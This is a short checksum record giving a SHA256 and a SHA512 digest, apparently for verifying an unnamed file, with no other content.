SHA256b4429685230b59b966c71b2b94097b993eabb84e0c4c3ca104af060bcc830bcb
SHA512ca085ed7991a725ee94b144f329bb927cab2c4f6e5d8ece1725104da3d66fb183a387d2c3a15200e7218c64e0dd6cf195754bd8d011548581396e7747817e5fe